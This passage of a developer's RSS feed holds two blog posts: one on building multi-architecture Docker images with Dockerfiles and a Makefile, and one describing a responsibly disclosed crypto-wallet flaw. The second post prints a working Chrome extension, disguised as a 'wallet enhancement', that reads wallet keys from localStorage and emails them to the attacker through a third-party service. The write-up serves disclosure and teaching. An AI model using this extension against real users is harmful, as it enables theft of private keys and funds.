&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nt"&gt;--mount&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cache,target&lt;span class="o"&gt;=&lt;/span&gt;/root/.cache &lt;span class="se"&gt;\
&lt;/span&gt;    &lt;span class="nb"&gt;.&lt;/span&gt; /root/.bashrc &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; conda activate de_agent &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; requirements.txt &lt;span class="nt"&gt;--extra-index-url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;https://&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;DE_AGENT_PYPI_TOKEN&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:@pypi. &lt;span class="k"&gt;****&lt;/span&gt;.ai/pypi/ &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;    pip &lt;span class="nb"&gt;install &lt;/span&gt;&lt;span class="nv"&gt;numpy&lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;1.23.5

&lt;span class="c"&gt;# Cleanup&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;apt &lt;span class="nt"&gt;-qy&lt;/span&gt; purge &lt;span class="nt"&gt;--auto-remove&lt;/span&gt; build-essential g++ gcc libssl-dev cmake git wget
&lt;span class="k"&gt;RUN &lt;/span&gt;apt autoremove &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt clean
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/lib/apt/lists/&lt;span class="k"&gt;*&lt;/span&gt;

&lt;span class="c"&gt;# Create a user&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;groupadd &lt;span class="nt"&gt;-r&lt;/span&gt; de_agent &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; useradd &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="nt"&gt;-g&lt;/span&gt; de_agent de_agent
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;chown&lt;/span&gt; &lt;span class="nt"&gt;-R&lt;/span&gt; de_agent:de_agent /app

&lt;span class="k"&gt;USER&lt;/span&gt;&lt;span class="s"&gt; de_agent&lt;/span&gt;

&lt;span class="c"&gt;# Run the web application&lt;/span&gt;

&lt;span class="k"&gt;EXPOSE&lt;/span&gt;&lt;span class="s"&gt; 8000&lt;/span&gt;

&lt;span class="k"&gt;ENTRYPOINT&lt;/span&gt;&lt;span class="s"&gt; ["PYTHONPATH=.", "python", "main.py"]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Dockerfile.arm64&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;As you can see, the manifest is quite verbose. It also adds the Conda binaries and related files to a release image. It is a price that must be paid.&lt;/p&gt;

&lt;p&gt;Fortunately, for Linux, we don't need all of this machinery:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;python:3.9-slim-buster&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;base&lt;/span&gt;

&lt;span class="k"&gt;ENV&lt;/span&gt;&lt;span class="s"&gt; PYTHONDONTWRITEBYTECODE=1&lt;/span&gt;
&lt;span class="k"&gt;ENV&lt;/span&gt;&lt;span class="s"&gt; PYTHONUNBUFFERED=1&lt;/span&gt;

&lt;span class="c"&gt;# Install system packages&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get &lt;span class="nt"&gt;-y&lt;/span&gt; upgrade
&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; &lt;span class="nt"&gt;--no-install-recommends&lt;/span&gt; build-essential g++ gcc libssl-dev cmake git wget
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/lib/apt/lists/&lt;span class="k"&gt;*&lt;/span&gt;

&lt;span class="c"&gt;# Copy application files&lt;/span&gt;

&lt;span class="k"&gt;WORKDIR&lt;/span&gt;&lt;span class="s"&gt; /app&lt;/span&gt;

&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; app/ .&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; logging.yaml .&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; main.py .&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; requirements.txt ./&lt;/span&gt;

&lt;span class="c"&gt;# Install Python dependencies&lt;/span&gt;

&lt;span class="k"&gt;ARG&lt;/span&gt;&lt;span class="s"&gt; DE_AGENT_PYPI_TOKEN&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nt"&gt;--mount&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;cache,target&lt;span class="o"&gt;=&lt;/span&gt;/root/.cache &lt;span class="se"&gt;\
&lt;/span&gt;    pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; requirements.txt &lt;span class="nt"&gt;--extra-index-url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;https://&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;DE_AGENT_PYPI_TOKEN&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:@pypi. &lt;span class="k"&gt;****&lt;/span&gt;.ai/pypi/

&lt;span class="c"&gt;# Cleanup&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;apt &lt;span class="nt"&gt;-qy&lt;/span&gt; purge &lt;span class="nt"&gt;--auto-remove&lt;/span&gt; build-essential g++ gcc libssl-dev cmake git wget
&lt;span class="k"&gt;RUN &lt;/span&gt;apt autoremove &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt clean
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/lib/apt/lists/&lt;span class="k"&gt;*&lt;/span&gt;

&lt;span class="c"&gt;# Create a user&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;groupadd &lt;span class="nt"&gt;-r&lt;/span&gt; de_agent &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; useradd &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="nt"&gt;-g&lt;/span&gt; de_agent de_agent
&lt;span class="k"&gt;RUN &lt;/span&gt;&lt;span class="nb"&gt;chown&lt;/span&gt; &lt;span class="nt"&gt;-R&lt;/span&gt; de_agent:de_agent /app

&lt;span class="k"&gt;USER&lt;/span&gt;&lt;span class="s"&gt; de_agent&lt;/span&gt;

&lt;span class="c"&gt;# Run the web application&lt;/span&gt;

&lt;span class="k"&gt;EXPOSE&lt;/span&gt;&lt;span class="s"&gt; 8000&lt;/span&gt;

&lt;span class="k"&gt;ENTRYPOINT&lt;/span&gt;&lt;span class="s"&gt; ["PYTHONPATH=.", "python", "main.py"]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Dockerfile.amd64&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The question now is how to build Docker images for both architectures on a Mac. This is where Docker comes in. Docker Desktop officially supports &lt;a href="https://www.docker.com/blog/multi-arch-images/?ref=akrisanov.com"&gt;building multi-arch images for Arm and x86&lt;/a&gt;. Learning this, I was able to add a few targets to my Makefile to quickly build images:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;build: # Build a Docker image for x86_64
    docker buildx build --platform linux/amd64 -t de-agent:amd64-latest --build-arg DE_AGENT_PYPI_TOKEN=${DE_AGENT_PYPI_TOKEN} -f Dockerfile.amd64 --no-cache .

build-arm: # Build a Docker image for arm64
    docker buildx build --platform linux/arm64 -t de-agent:arm64-latest --build-arg DE_AGENT_PYPI_TOKEN=${DE_AGENT_PYPI_TOKEN} -f Dockerfile.arm64 --no-cache .
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Makefile&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;make build
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--RLm9-hA_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/Screenshot-2023-08-10-at-21.52.06.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--RLm9-hA_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/Screenshot-2023-08-10-at-21.52.06.png" alt="Building Multi-Arch Images for Arm and x86" width="800" height="84"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Docker image built for the amd64 architecture&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;One can say, it's so much hassle for doing all of this locally and a proper CI can solve such a case easily. I agree – as I've mentioned, I like shifting work out of my shoulders and giving it to some machine in the cloud. But in situations where CI is not available, creating multi-arch images can save the day. It certainly did for me.&lt;/p&gt;

</description>
      <category>docker</category>
      <category>build</category>
      <category>arm64</category>
      <category>applesilicon</category>
    </item>
    <item>
      <title>Accidentally found a vulnerability in a crypto wallet and made $1,000</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Sat, 05 Aug 2023 11:16:49 +0000</pubDate>
      <link>https://dev.to/akrisanov/accidentally-found-a-vulnerability-in-a-crypto-wallet-and-made-1000-4gdl</link>
      <guid>https://dev.to/akrisanov/accidentally-found-a-vulnerability-in-a-crypto-wallet-and-made-1000-4gdl</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ChO6mbd7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/sleeping-shepherd.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ChO6mbd7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/sleeping-shepherd.webp" alt="© RMN / Rèunion des Musèes Nationaux / Sleeping Shepherd by François Boucher" width="800" height="450"&gt;&lt;/a&gt; &lt;em&gt;© RMN / Rèunion des Musèes Nationaux / Sleeping Shepherd by François Boucher&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In January 2022, I joined the community of one of the proof-of-stake blockchains. To play with what the protocol and its ecosystem offered, I created a wallet account on the official website &lt;code&gt;https://wallet. ****.org&lt;/code&gt;. Apart from general curiosity, I was interested in how they achieved security in a browser, especially in the age of extensions and client-side vulnerabilities.&lt;/p&gt;

&lt;p&gt;It turned out that when a user logged in, the wallet application (built in React) generated a set of public and private keys and stored them in the browser's local storage. With my experience of building authentication and authorisation in distributed systems, I knew this was not the best thing to do – in general, it's easy for a browser extension and client-side code to read data from local storage&lt;sup&gt;1&lt;/sup&gt;.&lt;/p&gt;

&lt;p&gt;To prove this, I decided to &lt;a href="https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/?ref=akrisanov.com"&gt;write a simple extension for Chrome&lt;/a&gt; that would retrieve keys from a victim's browser and send them to my anonymous email address.&lt;/p&gt;

&lt;p&gt;The root directory of my pickpocket extension looked like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;.
├── content.js
├── email.min.js
├── index.html
└── manifest.json

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The main files are the &lt;code&gt;manifest.json&lt;/code&gt; and &lt;code&gt;content.js&lt;/code&gt;. The former is essential for installing the extension.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
  "name": "X Wallet Enhancement",
  "version": "1.0",
  "manifest_version": 3,
  "content_scripts": [
    {
      "matches": [
        "https://wallet. ****.org/*"
      ],
      "js": [
        "email.min.js",
        "content.js"
      ]
    }
  ]
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;email.min.js&lt;/code&gt; is just a client library from one of the cloud services that allows you to send email directly from a browser without any server code. &lt;code&gt;index.html&lt;/code&gt; is a blank HTML page that displays nothing. The wallet hijacking logic lived in the &lt;code&gt;content.js&lt;/code&gt; file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;emailjs.init('user_ ****'); // instantiating an email delivery service

let templateParams = {
    // gathering information about the victim's browser
    from_name: navigator.userAgent,
    // fetching wallet keys from the local storage
    storage: window.localStorage.getItem('_*:wallet:active_account_id_**'),
};

// using a prepared email template to send an email with keys
const serviceID = 'service_ ****';
const templateID = 'template_ ****';

emailjs.send(serviceID, templateID, templateParams)
    .then(() =&amp;gt; {
        console.log("Wallet keys were send!");
    }, (err) =&amp;gt; {
        console.error(JSON.stringify(err));
    });

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Yes, such a dummy script.&lt;/p&gt;

&lt;p&gt;I packed all four files into a zip archive and kindly asked my friend, who also had a wallet at &lt;code&gt;https://wallet.***.org&lt;/code&gt;, to install my creation in his browser (pretending to do some social engineering). Before doing so, I told him about my findings and the theory I was trying to prove. He was happy to help, and the public and private keys of this wallet account appeared in my inbox a few seconds after the browser extension was installed. Next, I saved the keys to local storage in my browser and opened the wallet website.&lt;/p&gt;

&lt;p&gt;Surprisingly, my friend's crypto-wallet balance was available to me, along with an option to withdraw the funds. During a Zoom call with my victim friend, I transferred some of his funds to an anonymous account and back. It was mind-blowing! A new, promising blockchain that had recently closed an investment round had a major vulnerability in its wallet. Worst of all, they had 2-factor authentication for users. Of course, not many people would activate it right away, and many didn't.&lt;/p&gt;

&lt;p&gt;As an ethical developer, I created a vulnerability report, including the source code of the browser extension and my thoughts on how to improve the security of the web application. It was sent directly to the security team's email address on 18th of January. A few days later, I had a call with the CISO of the blockchain protocol, who assured me that they were aware of the issue and would address it in the next release. I was a little disappointed with the speed of the response to the incident. Two days is an eternity when one speaks about users' money. Nevertheless, the blockchain developers granted me their tokens in an amount equivalent to 1000 USDT.&lt;/p&gt;

&lt;p&gt;👉 &lt;strong&gt;Advice for application developers:&lt;/strong&gt; be aware of the technologies you use and their security aspects.&lt;/p&gt;

&lt;p&gt;💡 &lt;strong&gt;Advice for crypto users:&lt;/strong&gt; learn what security options an organisation offers to you, activate two-factor authentication as soon as you create a wallet account, don't store all of your funds in hot wallets.&lt;/p&gt;




&lt;h3&gt;
  
  
  Worth reading
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://snyk.io/blog/is-localstorage-safe-to-use/?ref=akrisanov.com"&gt;Is LocalStorage safe to use? | Snyk&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.rdegges.com/2018/please-stop-using-local-storage/?ref=akrisanov.com"&gt;Please Stop Using Local Storage&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies?ref=akrisanov.com"&gt;Using HTTP cookies - HTTP | MDN&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://owasp.org/www-community/HttpOnly?ref=akrisanov.com"&gt;HttpOnly | OWASP Foundation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>crypto</category>
      <category>singlepageapp</category>
      <category>web3</category>
    </item>
  </channel>
</rss>
